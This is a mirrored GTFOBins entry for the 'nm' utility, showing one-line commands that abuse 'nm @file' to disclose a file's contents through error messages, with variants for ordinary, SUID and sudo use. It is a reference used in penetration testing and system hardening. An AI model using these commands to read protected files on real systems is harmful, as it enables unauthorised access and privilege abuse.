mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
7e2e188305
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
17 lines
397 B
Markdown
17 lines
397 B
Markdown
---
|
|
description: The file content is treated as command line options and disclosed through error messages, so this is not suitable for reading arbitrary binary data.
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
nm @$LFILE
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
./nm @$LFILE
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
sudo nm @$LFILE
|
|
---
|